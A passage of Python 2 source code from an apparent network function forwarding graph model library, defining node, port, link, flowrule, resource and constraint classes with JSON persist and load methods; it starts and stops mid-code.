def add_constraint (self, id, formula):
"""
Set constraint value.
:param id: unique ID
:type id: str or int
:param formula: new value
:type formula: str or int
:return: new value
:rtype: str or int
"""
self.constraint[id] = formula
return formula
def has_constraint (self, id):
"""
Return True if variable value with key is exist.
:param id: unique ID
:type id: str or int
:return: value exits or not
:rtype: bool
"""
return id in self.constraint
def del_constraint (self, id):
"""
Remove antiaffinity value with given id.
:param id: unique ID
:type id: str or int
:return: removed value
:rtype: str or int
"""
if id in self.constraint:
return self.constraint.pop(id)
else:
return None
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: list
"""
constraints = super(Constraints, self).persist()
if self.affinity:
constraints['affinity'] = self.affinity
if self.antiaffinity:
constraints['antiaffinity'] = self.antiaffinity
if self.variable:
constraints['variable'] = self.variable
if self.constraint:
constraints['constraint'] = self.constraint
if self.restorability:
constraints['restorability'] = self.restorability
return constraints
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
super(Constraints, self).load(data=data)
self.affinity = data.get('affinity', OrderedDict())
self.antiaffinity = data.get('antiaffinity', OrderedDict())
self.variable = data.get('variable', OrderedDict())
self.constraint = data.get('constraint', OrderedDict())
self.restorability = data.get('restorability')
return self
class Node(Element):
"""
Base class for different types of nodes in the NF-FG.
"""
# Class of the contained ports
PORT_CLASS = Port
"""Class of the contained ports"""
# Node type constants:
# Infrastructure node --> abstract node represents one or more physical node
INFRA = "INFRA"
# SAP nodes --> abstract node represents end point/ports of a service
SAP = "SAP"
# Network Function (NF) node --> abstract node represents a virtual function
NF = "NF"
__slots__ = ('name', 'ports', 'metadata', 'constraints')
def __init__ (self, type, id=None, name=None, metadata=None):
"""
Init.
:param type: node type
:type type: str
:param id: optional id
:type id: str or int
:param name: optional name
:type name: str
:param metadata: metadata related to Node
:type metadata: dict
:return: None
"""
super(Node, self).__init__(id=id, type=type)
self.name = name if name is not None else str(id) # optional
self.ports = PortContainer() # list of Ports
self.metadata = OrderedDict(metadata if metadata else {})
self.constraints = Constraints()
@property
def short_name (self):
"""
Return a generic shor name.
:return: short name
:rtype: str
"""
return self.name if self.name else "id: %s" % self.id
def flowrules (self):
"""
Return with an iterator over the flowrules sored in the ports.
:return: iterator of flowrules
:rtype: collections.Iterator
"""
return self.ports.flowrules
def add_port (self, id=None, name=None, properties=None, sap=None,
capability=None, technology=None, delay=None, bandwidth=None,
cost=None, controller=None, orchestrator=None, l2=None, l4=None,
metadata=None):
"""
Add a port with the given params to the :any:`Node`.
:param id: optional id
:type id: str or int
:param properties: supported properties of the port
:type properties: str or iterable(str)
:param name: optional name
:type name: str
:param sap: inter-domain SAP identifier
:type sap: str
:param capability: optional capabilities
:type capability: str
:param technology: supported technologies
:type technology: str
:param delay: delay
:type delay: float
:param bandwidth: bandwidth
:type bandwidth: float
:param cost: cost
:type cost: str
:param controller: controller URL
:type controller: str
:param orchestrator: orchestrator URL
:type orchestrator: str
:param l2: l2 address
:param l2: str
:param l4: l4 fields
:type l4: str
:param metadata: metadata related to Node
:type metadata: dict
:return: newly created and stored Port object
:rtype: :any:`Port`
"""
port = Port(node=self, id=id, name=name, properties=properties, sap=sap,
capability=capability, technology=technology, delay=delay,
bandwidth=bandwidth, cost=cost, controller=controller,
orchestrator=orchestrator, l2=l2, l4=l4, metadata=metadata)
self.ports.append(port)
return port
def del_port (self, id):
"""
Remove the port with the given id from the Node.
:param id: port id
:type id: int or str
:return: the actual Port is found and removed or not
:rtype: bool
"""
for port in self.ports:
if port.id == id:
del port.node
return self.ports.remove(port)
return False
def has_port (self, id):
"""
Return True if the :any:`Node` has a port with the given `id`.
:param id: optional id
:type id: str or int
:return: has port with given id or not
:rtype: bool
"""
for p in self.ports:
if p.id == id:
return True
return False
def add_metadata (self, name, value):
"""
Add metadata with the given `name`.
:param name: metadata name
:type name: str
:param value: metadata value
:type value: str
:return: the :any:`Node` object to allow function chaining
:rtype: :any:`Node`
"""
self.metadata[name] = value
return self
def has_metadata (self, name):
"""
Return True if the :any:`Node` has a metadata with the given `name`.
:param name: metadata name
:type name: str
:return: has metadata with given name or not
:rtype: bool
"""
return name in self.metadata
def del_metadata (self, name=None):
"""
Remove the metadata from the :any:`Node`. If no metadata is given all the
metadata will be removed.
:param name: name of the metadata
:type name: str
:return: removed metadata or None
:rtype: str or None
"""
if name is None:
self.metadata.clear()
else:
return self.metadata.pop(name, None)
def get_metadata (self, name):
"""
Return the value of metadata.
:param name: name of the metadata
:type name: str
:return: metadata value
:rtype: str
"""
return self.metadata.get(name)
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
node = super(Node, self).persist()
if self.name is not None:
node["name"] = self.name
ports = self.ports.persist()
if ports:
node["ports"] = ports
if self.metadata:
node["metadata"] = self.metadata.copy()
constraints = self.constraints.persist()
if constraints:
node['constraints'] = constraints
return node
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
super(Node, self).load(data=data)
self.name = data.get('name') # optional
for item in data.get('ports', ()):
port = self.PORT_CLASS(node=self)
port.load(data=item)
self.ports.append(port)
self.metadata = OrderedDict(data.get('metadata', ()))
if 'constraints' in data:
self.constraints.load(data=data['constraints'])
return self
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return "<|ID: %s, Type: %s --> %s|>" % (
self.id, self.type, super(Element, self).__repr__())
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return "%s(id:%s, type:%s)" % (self.__class__.__name__, self.id, self.type)
class Link(Element):
"""
Base class for different types of edges in the NF-FG.
"""
# Edge type constants:
# Static link --> physical link between saps and infras
STATIC = "STATIC"
# Dynamic link --> virtual link between nfs and infras created on demand
DYNAMIC = "DYNAMIC"
# SG next hop --> virtual link to describe connection between elements in SG
SG = "SG"
# Requirement --> virtual link to define constraints between SG elements
REQUIREMENT = "REQUIREMENT"
__slots__ = ('src', 'dst', 'constraints')
def __init__ (self, src, dst, type=None, id=None, constraints=None):
"""
Init.
:param src: source port
:type src: :any:`Port`
:param dst: destination port
:type dst: :any:`Port`
:param type: link type
:type type: str
:param id: optional id
:type id: str or int
:param constraints: optional Constraints object
:type constraints: :class:`Constraints`
:return: None
"""
super(Link, self).__init__(id=id, type=type)
if (src is not None and not isinstance(src, Port)) or \
(dst is not None and not isinstance(dst, Port)):
raise RuntimeError("Src and dst must be Port objects!")
# Reference to src Port object
self.src = src # mandatory
# Reference to dst Port object
self.dst = dst # mandatory
self.constraints = constraints if constraints is not None else Constraints()
def copy (self):
"""
Skip deepcopy of ``src`` and ``dst`` references in case the :any:`Link`
object is copied directly. Deepcopy called on an upper object has already
cloned the references when it gets to a Port object and it will skip the
re-cloning due to its internal memoization feature.
:return: copied object
:rtype: :any:`Link`
"""
tmp_src, tmp_dst = self.src, self.dst
self.src = self.dst = None
clone = super(Link, self).copy()
self.src, self.dst = tmp_src, tmp_dst
return clone
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
link = super(Link, self).persist()
link['src_node'] = self.src.node.id
link['src_port'] = self.src.id
link['dst_node'] = self.dst.node.id
link['dst_port'] = self.dst.id
constraints = self.constraints.persist()
if constraints:
link['constraints'] = constraints
return link
def load (self, data, container=None, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:param container: main container node
:type container: :any:`NFFGModel`
:return: None
"""
if container is None:
raise RuntimeError(
"Container reference is not given for edge endpoint lookup!")
super(Link, self).load(data=data)
self.src = container.get_port(data['src_node'], data['src_port'])
self.dst = container.get_port(data['dst_node'], data['dst_port'])
if self.src is None:
raise RuntimeError("Src not found with params: %s !" % data)
if self.dst is None:
raise RuntimeError("Dst not found with params: %s !" % data)
if 'constraints' in data:
self.constraints.load(data=data['constraints'])
return self
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return "<|ID: %s, Type: %s, src: %s[%s], dst: %s[%s] --> %s|>" % (
self.id, self.type, self.src.node.id, self.src.id, self.dst.node.id,
self.dst.id, super(Element, self).__repr__())
################################################################################
# ---------- NODE AND LINK RESOURCES, ATTRIBUTES -------------------
################################################################################
class DelayMatrix(Persistable):
"""
Delay Matrix keyed by Port IDs.
"""
__slots__ = ('matrix',)
def __init__ (self):
super(DelayMatrix, self).__init__()
self.matrix = OrderedDict()
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: list
"""
res = super(DelayMatrix, self).persist()
for k, v in self.matrix.iteritems():
if not isinstance(v, dict):
continue
for kk, vv in v.iteritems():
if k not in res:
res[k] = OrderedDict()
try:
res[k][kk] = float(vv)
except ValueError:
res[k][kk] = vv
return res
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
self.matrix.update(data)
return self
def is_empty (self):
"""
Check if matrix object is empty or not.
:return: is empty
:rtype: bool
"""
return sum([len(e) for e in self.matrix]) == 0
def add_delay (self, src, dst, delay):
"""
Add delay value with given ports.
:param src: source port object
:type src: :class:`Port`
:param dst: destination port object
:type dst: :class:`Port`
:param delay: delay value between ports
:type delay: int or float
:return: None
"""
if src not in self.matrix:
self.matrix[src] = OrderedDict()
self.matrix[src][dst] = delay
def get_delay (self, src, dst):
"""
Return delay value defined between given ports.
:param src: source port object
:type src: :class:`Port`
:param dst: destination port object
:type dst: :class:`Port`
:return: delay value
:rtype: int or float
"""
# id-s are always string in delay matrix, because of JSON standard
if src in self.matrix:
if dst in self.matrix[src]:
return self.matrix[src][dst]
def del_delay (self, src, dst):
"""
Remove delay value from matrix.
:param src: source port object
:type src: :class:`Port`
:param dst: destination port object
:type dst: :class:`Port`
:return: removed value
:rtype: int or float or None
"""
# id-s are always string in delay matrix, because of JSON standard
if src in self.matrix:
if dst in self.matrix[src]:
return self.matrix[src].pop(dst)
def __contains__ (self, item):
return item in self.matrix
def __getitem__ (self, item):
return self.matrix[item]
def __iter__ (self):
return ((src, dst, self.matrix[src][dst])
for src in self.matrix
for dst in self.matrix[src])
class NodeResource(Persistable):
"""
Class for storing resource information for Nodes.
"""
__slots__ = ('cpu', 'mem', 'storage', 'cost', 'zone', 'delay', 'bandwidth')
def __init__ (self, cpu=None, mem=None, storage=None, cost=None, zone=None,
delay=None, bandwidth=None):
"""
Init.
:param cpu: CPU resource
:type cpu: float
:param mem: memory resource
:type mem: float
:param storage: storage resource
:type storage: float
:param cost: cost
:type cost: float
:param zone: zone
:type zone: str
:param delay: delay property of the Node
:type delay: float
:param bandwidth: bandwidth property of the Node
:type bandwidth: float
:return: None
"""
super(NodeResource, self).__init__()
# container: compute
self.cpu = cpu
self.mem = mem
self.storage = storage
# container
self.cost = cost
self.zone = zone
self.delay = delay
self.bandwidth = bandwidth
def subtractNodeRes (self, subtrahend, maximal, link_count=1):
"""
Subtracts the subtrahend nffg_elements.NodeResource object from the current.
Note: only delay component is not subtracted, for now we neglect the load`s
influence on the delay. Link count identifies how many times the bandwidth
should be subtracted. Throw exception if any field of the 'current' would
exceed 'maximal' or get below zero.
:param subtrahend: the object to be subtracted from current
:type subtrahend: NodeResource
:param maximal: The maximal value which must not be exceeded.
:type maximal: NodeResource
:param link_count: how many times the should the bandwidth component be
subtracted.
:type link_count: int
:return: self resource object
:rtype: :any:`NodeResource`
"""
attrlist = ['cpu', 'mem', 'storage', 'bandwidth'] # delay excepted!
if reduce(lambda a, b: a or b, (self[attr] is None for attr in attrlist)):
raise RuntimeError("Node resource components should always be given"
"One of %s`s components is None" % str(self))
if not reduce(lambda a, b: a and b,
(-1e-6 <= self[attr] - subtrahend[attr] <= maximal[
attr] + 1e-6 for attr in attrlist if
attr != 'bandwidth' and subtrahend[attr] is not None)):
raise RuntimeError("Node resource got below zero, or "
"exceeded the maximal value!")
if subtrahend['bandwidth'] is not None:
if not -1e-6 <= self['bandwidth'] - link_count * subtrahend[
'bandwidth'] <= maximal['bandwidth'] + 1e-6:
raise RuntimeError("Internal bandwidth cannot get below "
"zero, or exceed the maximal value!")
for attr in attrlist:
k = 1
if attr == 'bandwidth':
k = link_count
if subtrahend[attr] is not None:
self[attr] -= k * subtrahend[attr]
return self
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
res = super(NodeResource, self).persist()
if self.cpu is not None:
res["cpu"] = self.cpu
if self.mem is not None:
res["mem"] = self.mem
if self.storage is not None:
res["storage"] = self.storage
if self.cost is not None:
res["cost"] = self.cost
if self.zone is not None:
res["zone"] = self.zone
if self.delay is not None:
res["delay"] = self.delay
if self.bandwidth is not None:
res["bandwidth"] = self.bandwidth
return res
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
self.cpu = float(data['cpu']) if 'cpu' in data else None
self.mem = float(data['mem']) if 'mem' in data else None
self.storage = float(data['storage']) if 'storage' in data else None
self.cost = data['cost'] if 'cost' in data else None
self.zone = float(data['zone']) if 'zone' in data else None
self.delay = float(data['delay']) if 'delay' in data else None
self.bandwidth = float(data['bandwidth']) if 'bandwidth' in data else None
return self
def __getitem__ (self, item):
"""
Return the resource attribute given by ``item``:
:param item: attribute name
:type item: str
:return: attribute value
:rtype: int or object
"""
if hasattr(self, item):
return getattr(self, item)
else:
raise KeyError(
"%s object has no key: %s" % (self.__class__.__name__, item))
def __setitem__ (self, key, value):
"""
Set the resource attribute given by ``key`` with ``value``:
:param key: attribute name
:type key: str
:param value: new value
:type value: int or object
:return: None
"""
if hasattr(self, key):
return setattr(self, key, value)
else:
raise KeyError(
"%s object has no key: %s" % (self.__class__.__name__, key))
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return "Resources of %s: cpu: %s, mem: %s, storage: %s, bandwidth: %s, " \
"delay: %s" % (self.__class__.__name__, self.cpu, self.mem,
self.storage, self.bandwidth, self.delay)
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return "cpu: %s mem: %s storage: %s cost: %s zone: %s bandwidth: %s" \
" delay: %s" % (self.cpu, self.mem, self.storage, self.cost,
self.zone, self.bandwidth, self.delay)
def is_empty (self):
"""
Return False if no resource value are set or 0.
:return: resource values are set or not
:rtype: bool
"""
return False if any((self.cpu, self.mem, self.storage, self.cost, self.zone,
self.delay, self.bandwidth)) else True
class Flowrule(Element):
"""
Class for storing a flowrule.
"""
__slots__ = ('match', 'action', 'bandwidth', 'delay', 'cost', 'qos',
'external', 'constraints')
def __init__ (self, id=None, match="", action="", bandwidth=None, delay=None,
cost=None, qos=None, external=False, constraints=None):
"""
Init.
:param match: matching rule
:type match: str
:param action: forwarding action
:type action: str
:param bandwidth: bandwidth
:type bandwidth: float
:param delay: delay
:type delay: float
:param external: mark the flowrule as external --> should not process
:type external: bool
:return: None
"""
super(Flowrule, self).__init__(id=id, type="FLOWRULE")
self.match = match # mandatory
self.action = action # mandatory
self.bandwidth = bandwidth
self.delay = delay
self.cost = cost
self.qos = qos
self.external = external
self.constraints = constraints if constraints is not None else Constraints()
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
flowrule = super(Flowrule, self).persist()
if self.match:
flowrule['match'] = self.match
if self.action:
flowrule['action'] = self.action
if self.bandwidth:
flowrule['bandwidth'] = self.bandwidth
if self.delay:
flowrule['delay'] = self.delay
if self.cost:
flowrule['cost'] = self.cost
if self.qos:
flowrule['qos'] = self.qos
if self.external:
flowrule['external'] = self.external
constraints = self.constraints.persist()
if constraints:
flowrule['constraints'] = constraints
return flowrule
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
super(Flowrule, self).load(data=data)
self.match = data.get('match')
self.action = data.get('action')
self.bandwidth = float(data['bandwidth']) if 'bandwidth' in data else None
self.delay = float(data['delay']) if 'delay' in data else None
self.cost = data.get('cost')
self.qos = data.get('qos')
self.external = float(data['external']) if 'external' in data else False
if 'constraints' in data:
self.constraints.load(data=data['constraints'])
return self
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return "Flowrule object:\nmatch: %s\naction: %s\nbandwidth: " \
"%s\ndelay: %s\ncost: %s\nqos: %s\nexternal: %s" \
% (self.match, self.action, self.bandwidth, self.delay, self.cost,
self.qos, self.external)
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return "%s(id:%s, match: %s, action: %s, bandwidth: %s, delay: %s," \
"cost: %s, qos: %s, external: %s)" % (self.__class__.__name__,
self.id, self.match,
self.action, self.bandwidth,
self.delay, self.cost,
self.qos, self.external)
class InfraPort(Port):
"""
Class for storing a port of Infra Node and handles flowrules.
"""
__slots__ = ('flowrules',)
def __init__ (self, node, id=None, name=None, properties=None, sap=None,
capability=None, technology=None, delay=None, bandwidth=None,
cost=None, controller=None, orchestrator=None, l2=None, l4=None,
metadata=None):
"""
Init.
:param node: container node
:type node: :any:`Node`
:param id: optional id
:type id: str or int
:param properties: supported properties of the port
:type properties: str or iterable(str)
:param metadata: metadata related to Node
:type metadata: dict
:return: None
"""
super(InfraPort, self).__init__(node=node, id=id, name=name,
properties=properties, sap=sap,
capability=capability,
technology=technology, delay=delay,
bandwidth=bandwidth, cost=cost,
controller=controller,
orchestrator=orchestrator, l2=l2, l4=l4,
metadata=metadata)
self.flowrules = []
def add_flowrule (self, match, action, bandwidth=None, delay=None, cost=None,
qos=None, id=None, external=False, constraints=None):
"""
Add a flowrule with the given params to the port of an Infrastructure Node.
:param match: matching rule
:type match: str
:param action: forwarding action
:type action: str
:param bandwidth: bandwidth
:type bandwidth: float
:param delay: delay
:type delay: float
:param id: specific id of the flowrule
:type id: str or int
:param external: marked as external
:type external: bool
:param constraints: additional constraint object
:type constraints: :class:`Constraints`
:return: newly created and stored flowrule
:rtype: :any:`Flowrule`
"""
flowrule = Flowrule(id=id, match=match, action=action, bandwidth=bandwidth,
delay=delay, cost=cost, qos=qos, external=external,
constraints=constraints)
self.flowrules.append(flowrule)
return flowrule
def del_flowrule (self, id=None, match=None, action=None):
"""
Remove the flowrule with the given id or all flowrules which match the given
action/match parameters.
:param id: flowrule id
:type id: int or str
:param match: matching rule
:type match: str
:param action: forwarding action
:type action: str
:return: the actual FlowRule is found and removed or not
:rtype: bool
"""
if id is not None:
for f in self.flowrules:
if f.id == id:
self.flowrules.remove(f)
return True
else:
deletable = []
ret = False
for f in self.flowrules:
if f.match == match or f.action == action:
deletable.append(f)
for f in deletable:
self.flowrules.remove(f)
ret = True
return ret
def clear_flowrules (self):
"""
Delete all the flowrules from the port.
:return: None
"""
del self.flowrules[:]
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
port = super(InfraPort, self).persist()
flowrules = [f.persist() for f in self.flowrules]
if flowrules:
port["flowrules"] = flowrules
return port
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
super(InfraPort, self).load(data=data)
for fr in data.get('flowrules', ()):
self.flowrules.append(Flowrule().load(data=fr))
################################################################################
# ------------------------ NF / SAP / INFRASTRUCTURE NODES -------------------
################################################################################
class NodeNF(Node):
"""
Network Function (NF) nodes in the graph.
"""
__slots__ = ('functional_type', 'deployment_type', 'resources',
'placement_criteria')
def __init__ (self, id=None, name=None, func_type=None, dep_type=None,
res=None):
"""
Init.
:param func_type: functional type (default: "None")
:type func_type: str
:param dep_type: deployment type (default: "None")
:type dep_type: str
:param res: optional NF resources
:type res: :any:`NodeResource`
:return: None
"""
super(NodeNF, self).__init__(id=id, type=Node.NF, name=name)
self.functional_type = func_type # mandatory
# container: specification
self.deployment_type = dep_type
self.resources = res if res is not None else NodeResource()
# container
# Internal attributes for mapping
self.placement_criteria = ()
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
node = super(NodeNF, self).persist()
if self.functional_type is not None:
node["functional_type"] = self.functional_type
specification = OrderedDict()
if self.deployment_type is not None:
specification["deployment_type"] = self.deployment_type
res = self.resources.persist()
if res:
specification["resources"] = res
if specification:
node["specification"] = specification
return node
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
super(NodeNF, self).load(data=data)
self.functional_type = data.get('functional_type')
if 'specification' in data:
self.deployment_type = data['specification'].get('deployment_type')
if 'resources' in data['specification']:
self.resources.load(data['specification']['resources'])
return self
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return "%s(id:%s, type:%s)" % (
self.__class__.__name__, self.id, self.functional_type)
class NodeSAP(Node):
"""
Class for SAP nodes in the NF-FG.
"""
__slots__ = ('binding', 'placement_criteria')
def __init__ (self, id=None, name=None, binding=None, metadata=None):
"""
Init.
:param id: optional id
:type id: str or int
:param name: optional name
:type name: str
:param binding: interface binding
:type binding: str
:param metadata: metadata related to Node
:type metadata: dict
:return: None
"""
super(NodeSAP, self).__init__(id=id, type=Node.SAP, name=name,
metadata=metadata)
# Signals if the SAP is an inter-domain SAP
self.binding = binding
# Internal attributes for mapping
self.placement_criteria = ()
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return "SAP(id: %s, name: %s)" % (self.id, self.name)
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return super(NodeSAP, self).__repr__()
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
sap = super(NodeSAP, self).persist()
if self.binding is not None:
sap['binding'] = self.binding
return sap
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
super(NodeSAP, self).load(data=data)
self.binding = data.get('binding')
return self
class NodeInfra(Node):
"""
Class for infrastructure nodes in the NF-FG.
"""
PORT_CLASS = InfraPort
# Defined Infra types
TYPE_BISBIS = "BiSBiS"
TYPE_EE = "EE" # default Execution Environment with NETCONF
TYPE_STATIC_EE = "STATIC" # Static EE probably will never use
TYPE_SDN_SWITCH = "SDN-SWITCH" # Common OVS switch - can't run NF
# Defined domain type
DEFAULT_DOMAIN = "VIRTUAL"
__slots__ = ('mapping_features', 'domain', 'infra_type', 'supported',
'resources', 'delay_matrix', 'availres', 'weight')
def __init__ (self, id=None, name=None, domain=None, infra_type=None,
supported=None, res=None, mapping_features=None):
"""
Init.
:param mapping_features: dict from features string to bool
:type mapping_features: dict
:param domain: domain of the Infrastructure Node
:type domain: str
:param infra_type: type of the Infrastructure Node
:type infra_type: int or str
:param supported: list of supported functional types
:type supported: list
:param res: optional Infra resources
:type res: :any:`NodeResource`
:return: None
"""
super(NodeInfra, self).__init__(id=id, type=Node.INFRA, name=name)
self.mapping_features = mapping_features if mapping_features else {}
self.domain = domain if domain is not None else self.DEFAULT_DOMAIN
self.infra_type = infra_type if infra_type is not None else \
self.TYPE_BISBIS
# Set supported types according to given param type
if isinstance(supported, basestring):
self.supported = [str(supported), ]
elif isinstance(supported, Iterable):
self.supported = [sup for sup in supported]
elif supported is None:
self.supported = []
# Set resource container
self.resources = res if res is not None else NodeResource()
self.delay_matrix = DelayMatrix()
# Internal attributes for mapping
self.availres = None
self.weight = None
def add_port (self, id=None, name=None, properties=None, sap=None,
capability=None, technology=None, delay=None, bandwidth=None,
cost=None, controller=None, orchestrator=None, l2=None, l4=None,
metadata=None):
"""
Add a port with the given params to the Infrastructure Node.
Override the basic ``add_port()`` to use :any:`InfraPort` objects.
Add a port with the given params to the :any:`Node`.
:param id: optional id
:type id: str or int
:param properties: supported properties of the port
:type properties: str or iterable(str)
:param name: optional name
:type name: str
:param sap: inter-domain SAP identifier
:type sap: str
:param capability: optional capabilities
:type capability: str
:param technology: supported technologies
:type technology: str
:param delay: delay
:type delay: float
:param bandwidth: bandwidth
:type bandwidth: float
:param cost: cost
:type cost: str
:param controller: controller URL
:type controller: str
:param orchestrator: orchestrator URL
:type orchestrator: str
:param l2: l2 address
:param l2: str
:param l4: l4 fields
:type l4: str
:param metadata: metadata related to Node
:type metadata: dict
:return: newly created and stored Port object
:rtype: :any:`InfraPort`
"""
port = InfraPort(self, id=id, name=name, properties=properties, sap=sap,
capability=capability, technology=technology, delay=delay,
bandwidth=bandwidth, cost=cost, controller=controller,
orchestrator=orchestrator, l2=l2, l4=l4, metadata=metadata)
self.ports.append(port)
return port
def add_supported_type (self, functional_type):
"""
Add a supported functional type or list of types to the Infrastructure Node.
:param functional_type: the functional type
:type functional_type: str or list or tuple
:return: the Node object to allow function chaining
:rtype: :any:`NodeInfra`
"""
if isinstance(functional_type, basestring):
self.supported.append(functional_type)
elif isinstance(functional_type, Iterable):
self.supported.extend(functional_type)
else:
raise RuntimeError("Not supported parameter type!")
return self
def has_supported_type (self, functional_type):
"""
Return true if :any:`InfraPort` object has the given `functional_type`.
:param functional_type: functional type name
:type functional_type: str
:return: has the given functional type or not
:rtype: bool
"""
for ft in self.supported:
if ft == functional_type:
return True
return False
def del_supported_type (self, functional_type=None):
"""
Remove the given functional type from the Infrastructure Node. If no type
is given then all supported type will be removed.
:param functional_type: the functional type
:type functional_type: str
:return: None
"""
if functional_type is None:
self.supported[:] = []
else:
self.supported.remove(functional_type)
def has_enough_resource (self, res):
"""
Checks whether this :any:`NodeInfra` has at least 'res' resources available.
:param res: res name
:type res: :any:`NodeResource`
:return: has enough resource or not
:rtype: bool
"""
if not hasattr(self, 'availres'):
raise RuntimeError("Available resources not yet calculated for Infra %s!"
" Call calculate_available_node_res function first on "
"the containing NFFG instance!" % self.id)
try:
from copy import deepcopy
# do not do the actual subtraction!
availres = deepcopy(self.availres)
# throws RuntimeError if it couldn't be subtracted.
availres.subtractNodeRes(res, self.resources)
return True
except RuntimeError:
return False
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
node = super(NodeInfra, self).persist()
if self.domain is not None:
node["domain"] = self.domain
node["type"] = self.infra_type
supported = [sup for sup in self.supported]
if supported:
node['supported'] = supported
res = self.resources.persist()
if res:
node["resources"] = res
if self.mapping_features:
node['mapping_features'] = self.mapping_features.copy()
if not self.delay_matrix.is_empty():
node['delay_matrix'] = self.delay_matrix.persist()
return node
def load (self, data, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:return: None
"""
super(NodeInfra, self).load(data=data)
self.domain = data.get('domain', self.DEFAULT_DOMAIN) # optional
self.infra_type = data['type']
if 'supported' in data:
self.supported = data['supported']
if 'resources' in data:
self.resources.load(data['resources'])
if 'mapping_features' in data:
self.mapping_features = data['mapping_features']
if 'delay_matrix' in data:
self.delay_matrix.load(data['delay_matrix'])
return self
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return "Infra(id: %s, name: %s, type: %s)" % (
self.id, self.name, self.infra_type)
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return super(NodeInfra, self).__repr__()
################################################################################
# ---------- SG REQUIREMENTS / SG NEXT_HOPS / INFRASTRUCTURE LINKS -----------
################################################################################
class EdgeLink(Link):
"""
Class for static and dynamic links in the NF-FG.
Represent a static or dynamic link.
"""
__slots__ = ('backward', 'delay', 'bandwidth', 'cost', 'qos',
'availbandwidth', 'weight')
def __init__ (self, src=None, dst=None, type=None, id=None, backward=False,
delay=None,
bandwidth=None, cost=None, qos=None):
"""
Init.
:param src: source port
:type src: :any:`Port`
:param dst: destination port
:type dst: :any:`Port`
:param type: type of the link (default: Link.STATIC)
:type type: str
:param id: optional link id
:type id: str or int
:param backward: the link is a backward link compared to an another Link
:type backward: bool
:param delay: delay resource
:type delay: float
:param bandwidth: bandwidth resource
:type bandwidth: float
:param cost: cost
:type cost: str
:param qos: traffic QoS class
:type qos: str
:return: None
"""
type = type if type is not None else Link.STATIC
super(EdgeLink, self).__init__(src=src, dst=dst, type=type, id=id)
# Signal if the link is a backward link compared to an another existing
# Link with the same src and dst Node
self.backward = backward # always False by default
self.delay = delay # optional
self.bandwidth = bandwidth # optional
self.cost = cost
self.qos = qos
# Internal attributes for mapping
self.availbandwidth = None
self.weight = None
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
link = super(EdgeLink, self).persist()
if self.delay is not None:
link["delay"] = self.delay
if self.bandwidth is not None:
link["bandwidth"] = self.bandwidth
if self.cost is not None:
link["cost"] = self.cost
if self.qos is not None:
link["qos"] = self.qos
if self.backward:
link["backward"] = self.backward
return link
def load (self, data, container=None, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:param container: main container object
:type container: :any:`NFFGModel`
:return: None
"""
if container is None:
raise RuntimeError(
"Container reference is not given for edge endpoint lookup!")
for link in container.edge_links:
if link.id == data['id']:
raise RuntimeError("ID conflict during EdgeLink loading: %s" % link.id)
super(EdgeLink, self).load(data=data, container=container)
self.delay = float(data['delay']) if 'delay' in data else None
self.bandwidth = float(data['bandwidth']) if 'bandwidth' in data else None
self.cost = data.get('cost')
self.qos = data.get('qos')
self.backward = data.get('backward', False)
return self
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return "EdgeLink(id: %s, src: %s[%s], dst: %s[%s], type: %s, backward: " \
"%s, delay:%s, bandwidth: %s, cost: %s, qos: %s)" % (
self.id, self.src.node.id, self.src.id, self.dst.node.id,
self.dst.id, self.type, self.backward, self.delay, self.bandwidth,
self.cost, self.qos)
def __repr__ (self):
"""
Return with specific string representation.
:return: specific representation
:rtype: str
"""
return "<|ID: %s, Type: %s, Back: %s, src: %s[%s], dst: %s[%s] --> %s|>" % (
self.id, self.type, self.backward, self.src.node.id, self.src.id,
self.dst.node.id, self.dst.id, super(Element, self).__repr__())
class EdgeSGLink(Link):
"""
Class for links of SG.
Represent an edge between SG elements.
"""
__slots__ = ('flowclass', 'tag_info', 'delay', 'bandwidth',
'additional_actions')
def __init__ (self, src=None, dst=None, id=None, flowclass=None,
